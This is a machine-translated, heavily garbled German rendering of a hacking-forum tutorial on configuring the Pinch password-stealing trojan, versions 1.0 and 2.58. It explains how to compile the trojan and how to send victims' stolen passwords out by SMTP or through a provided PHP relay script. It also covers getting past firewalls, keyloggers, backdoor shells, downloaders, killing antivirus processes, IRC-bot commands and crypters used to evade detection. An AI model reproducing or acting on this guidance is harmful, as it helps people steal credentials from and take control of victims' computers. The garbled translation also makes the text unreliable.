This page has been robot translated, sorry for typos if any. Original content here.

Wir brechen Seife, wir verwenden BrutusAET2


MATERIAL IST FÜR WESENTLICHE ZWECKE GESTELLT. DER AUTOR IST FÜR KEINE VERANTWORTUNG NICHT VERANTWORTLICH


-------------------------------------------------- ----------------
Teil 1. Alt, aber nützlich. zur Prise 1

************************
Anweisungen für 1.0 klemmen
************************

=====
Intro
=====

Bitte wundern Sie sich nicht, dass ich mich entschlossen habe, einen ähnlichen Artikel (Artikel für Lamerzzz) zu schreiben. Tatsache ist, dass in meinem Forum (http://forum.web-hack.ru) etwa alle drei Tage ein Thema erstellt wird, z. B. "Wie man Pinch richtig einrichtet und verwendet", "Wie man Pinch ʻem verwendet". usw.

===========
Möglichkeiten
===========

Dieser Trojaner war im Jahr 2003/2004 weit verbreitet. Dank der Möglichkeit, eine große Anzahl von Passwörtern zu stehlen (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ und AIM, RQ, The Bat!, The Bat! ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp unterstützt)), geringes Gewicht, Open Source und einfach zu erstellende Aufgaben für eine bestimmte Aufgabe. Troyan hat folgende Eigenschaften:

- Senden Sie die Computerkonfiguration des Opfers: Betriebssystem, RAM, CPU, Festplatte, protokollierter Benutzer, Hostname, IP
- Keylogger (Schlüsselprotokoll)
- Remote-Konsole (Remote-Konsole)
- Umgehen der Firewall
- Senden Sie alle Passwörter per SMTP-Server an E-Mails
- Verschlüsselung der gestohlenen Passwörter per E-Mail
- Trojaner nach dem Start automatisch löschen
- HTML / Textberichte
- Die Dateigröße beträgt ca. 10Kb
- Modulares System
- Und vieles mehr...

Trojan schrieb coban2k (http://www.cobans.net) - eine ziemlich bekannte Person in der Welt des ICQ-Hackings. Aufgrund von Hosting-Problemen beim Speichern des Trojaners auf seinem Server musste der Autor diese Erstellung von seiner Website entfernen. Unglücklicherweise finden fast alle Antivirenprogramme diesen Trojaner und können nur an ein Opfer gesendet werden, das kein Antivirusprogramm hat.

=============
Komplettes Set
=============

Das Archiv (pinch_1.0.zip) mit dem Trojaner enthält die folgenden Ordner und Dateien:

\ PinchBuilder.exe - Trojaner-Assistent
\ Parser.exe - ein Programm zum Entschlüsseln verschlüsselter Buchstaben mit Passwörtern
\ readme.txt - keine Kommentare
\ Pinch \ - Hauptordner mit Trojaner-ASM-Quelle und Compiler
\ Quellen \ - andere Quellen
\ TB! 2 Plugin (Autoparser) \ - Ein Ordner mit einem Plugin für The Bat 2!, In dem verschlüsselte E-Mails mit Passwörtern dekodiert werden, die in Ihrem Posteingang eingehen
\ Sources \ Script \ - PHP-Skript, über das Passwörter gesendet werden, wenn die entsprechende Option beim Kompilieren ausgewählt wird (siehe unten)

==================
Kompilieren troy
==================

Im Lieferumfang ist ein spezieller Assistent (PinchBuilder.exe) enthalten, der den Trojaner entsprechend Ihren Anforderungen erstellt und den Trojaner direkt auf Ihrem Computer kompiliert. Das Programm hat zwei Hauptregisterkarten: Kompilieren und Entschlüsseln. Die erste dient zum Erstellen eines Trojaners und die zweite zum Entschlüsseln von Kennwörtern (tatsächlich ist diese Registerkarte das Ergebnis der Datei Parser.exe). Als nächstes kommen drei Unterreiter: SMTP, HTTP und FILE. Sie legen die Option zur Anzeige von Passwörtern fest. Lassen Sie uns jeden genauer untersuchen:

========
SMTP
========

Geben Sie im Feld Server die Adresse (Hostname / IP) des SMTP-Servers ein. Wenn Sie die Serverdomäne eingegeben haben, klicken Sie auf Auflösen, damit die Serverdomäne die Form einer IP-Adresse annimmt. Als Nächstes geben wir in den Feldern Von und Bis unsere Seife an. Die Schaltfläche Testmassage senden dient zum Versenden eines Testbriefes durch die von Ihnen festgelegten Einstellungen. Ich kann sie nur wärmstens empfehlen. Wenn der Brief nicht ankommt, bedeutet das, dass es Probleme beim Senden gibt (Firewall aktiviert, schlechtes SMTP, klicken Sie nicht auf Auflösen, usw.).

Ich möchte darauf hinweisen, dass die meisten Anbieter in letzter Zeit zu einem System wechseln, über das ihre Kunden E-Mails NUR von ihrem SMTP-Server aus senden können. In solchen Fällen empfehle ich die Methode zum Versenden von E-Mails über HTTP.

====
HTTP
====

Laden Sie die Datei \ Sources \ Script \ view.php auf den Server hoch, der PHP-Skripts unterstützt, und führt die mail () - Funktion aus. Im URL-Feld geben wir außerdem den Pfad zu diesem Skript an (zum Beispiel http://www.xss.ru/pinch.php). Im Feld Betreff geben wir den Namen des Themas an, von dem die Briefe gesendet werden. Im Feld Statusprüfung str sollte sich eine Zeichenfolge befinden, die vom Skript ausgegeben wird, nachdem es geladen wurde. Im Skript, das mit dem Troye geliefert wird, ist es wichtig: _ret_ok_1:

<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

Wenn dieser Wert vom Trojaner nicht akzeptiert wird, versucht er, jede Minute eine E-Mail durch dieses Skript zu senden, bis er eine Antwort im Feld aus dem Feld Status check str erhält. Ich empfehle Ihnen, das Skript nicht aus der Standardauslieferung zu verwenden, sondern von mir geschrieben:

<html> <Körper>
<? php
// Autor: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) und isset ($ subject) und isset ($ msg)) {
mail ($ email, $ subject, $ msg, "Von: $ email");}
?>
<script language = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

Es macht fast das gleiche, wird aber kompetenter geschrieben. Ein großer Vorteil bei der Verwendung dieser Methode zum Senden von Kennwörtern ist die Tatsache, dass Sie damit Kennwörter senden können, um die Firewall zu umgehen. Wie wird das erreicht? Hier ist ein Ausschnitt aus dem Outpost-Protokoll, wenn ein Passwort von meiner Site aus über ein Skript gesendet wird:

Prozessname: iexplorer.exe
Protokoll: HTTP
Remote-Adresse: www.web-hack.ru

Ich glaube, jeder hat verstanden, wer sich nicht im Tank befindet =) Außerdem kann ich von Profis hervorheben, dass verschlüsselte E-Mails auf Ihrer Website geschrieben werden können, anstatt sie an Seife zu senden. die Möglichkeit, die Seife, an die die Passwörter gesendet werden, zu ändern, falls sie gelöscht wird; während der Massenverteilung von Troy (damit Kennwörter auch von den Anbietern gesendet werden können, bei denen der Zugriff auf alle SMTP-Server außer ihnen deaktiviert ist)

====
DATEI
====

Diese Registerkarte legt den Pfad zu der Datei fest, in der alle Kennwörter gespeichert werden. Dazu müssen Sie den Pfad zur Datei in das Feld Pfad schreiben (z. B. C: \ password.txt).

==================
Compiler-Optionen
==================

In diesem Bereich ist alles klar, dann müssen Sie nur die Felder markieren, an denen Sie es benötigen. Beachten Sie das Feld Symbol hinzufügen. Es gibt den Pfad zu dem Symbol an, mit dem der kompilierte Trojaner angezeigt wird. Ich möchte darauf hinweisen, dass ich auf meinem System (Windows XP) Troy nicht mit aktivierter Option kompilieren konnte und deaktiviert werden musste.

Geben Sie in den Protokollfeldern die Methode an, mit der die Kennwörter gesendet werden (SMTP / HTTP / FILE). Klicken Sie anschließend auf die Schaltfläche Kompilieren. Der Trojaner sollte kompilieren. Dieser wird mit dem Assistenten im Hauptordner gespeichert, um ihn zu erstellen.

====================
Passwort-Entschlüsselung
====================

Angenommen, Sie haben es geschafft, den Spieler zu diesem Troi zu drängen, und Sie haben die Passwörter aus dem Auto des Opfers auf die Seife gesetzt. Tatsache ist, dass beim Senden von Passwörtern diese verschlüsselt werden und zuerst entschlüsselt werden müssen (es sei denn, Sie haben ein spezielles Plugin für TheBat! Oben beschrieben). Kopieren Sie den Text mit verschlüsselten Kennwörtern in die Zwischenablage, öffnen Sie Parser.exe (oder die Registerkarte Entschlüsseln in PinchBuilder.exe) und klicken Sie im Kontextmenü auf Process Data (oder drücken Sie einfach die Tastenkombination Alt + C). Das Programm gibt Ihnen dann alle vom Opfer gestohlenen Daten in einem bequemen Formular. Dann können Sie sie speichern oder drucken.

==========
Fazit
==========

Ich möchte Sie darauf hinweisen, dass Sie bei der Verwendung dieses Trojaners sofort unter Artikel 273 des Strafgesetzbuches fallen und ernsthaft bestraft werden können ;-) Ich (der Autor des Artikels) hafte nicht für den Schaden, der einer Person nach dem Lesen meines Artikels entstehen könnte.


------------------------------------

Teil 2. Anweisung zum Klemmen 2.58

Ein kleiner Artikel über die elementaren Einstellungen. Richten Sie nicht streng, sondern kritisieren Sie in voller Länge. Pinch-Setup-Artikel 2.58.

Ich denke, es gibt kein Problem mit crack th, es gibt keine detaillierte Hilfe und sogar ein Video ist beigefügt. Ich möchte zeigen, wie man Bilder einstellt:

SMTP-Eigenschaften
Server (geben Sie in Ihrem Fall smtp.mail.ru ein), müssen Sie auf Auflösen klicken, um die IP-Adresse in IP umzuwandeln (übrigens müssen alle Betrugsdelikte ausgeführt werden, wenn das Internet verbunden ist).

Port - lass es so wie es ist

Protokoll - die Wahl, wie der Bericht über SMTP, HTTP (über PHP) und FILE empfangen wird - auf dem Computer gespeichert. Schaltflächen mit demselben Namen (SMTP, HTTP, FILE), Protokolleinstellung, in diesem Fall sind wir jedoch an SMTP interessiert und haben es bereits konfiguriert.

TestSend- Schaltfläche zum Senden der Testnachricht an die E-Mail.

Registerkarte PWD - Verhindert, dass Kennwörter aus den aufgeführten Programmen stammen. Das Element ENABLE PWD beim Entfernen von Daws-Berichten enthält keine Kennwörter.
Galka Keine alten Berichte senden - Keine alten Berichte senden.
Galki Encrypt und Packing sind miteinander verbunden. FSG, UPX, MEW Verpackungsauswahl.

Registerkarte RUN - Wählen Sie die Startmethoden aus. Ich denke, du wirst es verstehen. Ziehen Sie als .... Standart, DLL, Undelate Service herunter. In einen Ordner verschieben ... oder Sie geben einen der Systemordner an oder wählen einen aus. Rechts die Spalte Werte, die ich nicht berührt habe, und mir ehrlich gesagt nur vage vorstellen, warum er es ist. Unten rechts - Windows-Firewall (SP2) umgehen - Um die Systemfirewall in SP2 zu umgehen (soweit ich den Mechanismus dieses Elements kenne - es wird als iexplorer.exe gestartet)

Die Registerkarte SPY - einige zusätzliche Berichte - hat bei mir nicht funktioniert. Screen Spy Fad - einen Screenshot machen, aber wieder hat es für mich nicht funktioniert (srkin wurde gesendet, aber es war leer)

NET- Registerkarte - Ich habe es nicht verwendet. Es ist beabsichtigt:
1. Öffnen Sie einen beliebigen Port auf dem infizierten Computer, und erhalten Sie entsprechend Zugriff darauf (ich empfehle Ihnen dringend, den Port nicht zu verwenden. Wenn Sie ihn nicht verschlüsseln. Wenn Sie erwischt werden, können Sie raten, was passieren wird ...)
2. Downloader - Hinweis auf einen direkten Link zu jeder Datei, die heruntergeladen und ausgeführt werden soll (schätzen Sie, welche Kosten Ihr Feind haben wird, wenn er über Datenverkehr verfügt).)))))
3. AutoUpdate - autoupdate - troy lädt nach Abschluss der Arbeit seine Kopie herunter und löscht sich anschließend bis zum nächsten Systemstart. Eine neue Kopie wird gestartet (dies ist für mehr Zuverlässigkeit, damit sie nicht gefunden wird).

Registerkarte BD (Backdoor) - Die Konsole öffnet eine Shell am ausgewählten Port, die Steuerung über Telnet (Telnet.exe) oder alternative Programme. (Ich habe es selbst nicht probiert)

Die Registerkarte ECT - Beleimen mit jeder Datei sowie das Installieren des Symbols ... Sie können dies auch tun, die Meldung wird angezeigt ... Aber etwas funktioniert nicht ...

Die Registerkarte KILL - Killing eines Prozesses (Sie können versuchen, das Antivirus zu töten), zum Beispiel "spidernt" - und dann wird der DrWEB-Monitor ausgeschaltet (ich warne Sie, ich habe es noch nicht getan, aber ich werde es versuchen)

IE- Registerkarte - Installieren Sie Ihre Startseite in Ihrem Browser. Seite zu Favoriten hinzufügen ....

WORM- Tab - Sie sollten nehmen, ich weiß nicht ... .....

Tab IRC-Bot - Zugriff auf den Computer über IRC:
.login autorisierung
.die - bot heruntergefahren
.download - Dateisprung von URL
.httpd - offener Dateizugriff über http an einem bestimmten Port
.killthread - Abschluss einer bestimmten Aufgabe
.proxy - Öffnen von Socks4 am ausgewählten Port mit der ausgewählten ID
.raw - Senden von unformatiertem Text an diesen IRC-Server
.Entfernen - Selbstlöschung
.restart - neu starten
.run - Ausführen von Befehlen
.scan - Scannen Sie IP-Adressen nach bestimmten offenen Ports
.shell - Öffnen einer Shell an einem bestimmten Port (nicht 95/98 / ME)
.status - Version, IP, Startdatum anzeigen
.threads - Zeigt aktive Aufgaben an
.update - Selbstaktualisierung des Bot über eine spezielle URL
.visit - Die ausgewählte URL wird ausgeblendet
.url - ausgewählte URL offen besuchen
.link - zu Favoriten hinzufügen
.sp - nach Hause machen
.msg - message (messagebox)

Das scheint alles zu sein ... Sie drücken COMPILE und ein Dreifach erscheint in Ihrem Ordner mit dem Builder ...

VIEL GLÜCK !!!!!

PS Dies ist, als wäre alles zur Überprüfung geschrieben und der Autor ist nicht für die Folgen verantwortlich ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Crypt-Funktionen:
Verwendeter polymorpher Kryptor
Umgehen von KIS und Outpost (einschließlich der neuesten Versionen)
Selbstentfernung
Reduzierte Größe (Normale Prise reduziert sich um 3-6kb, Zupacha Loader um 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~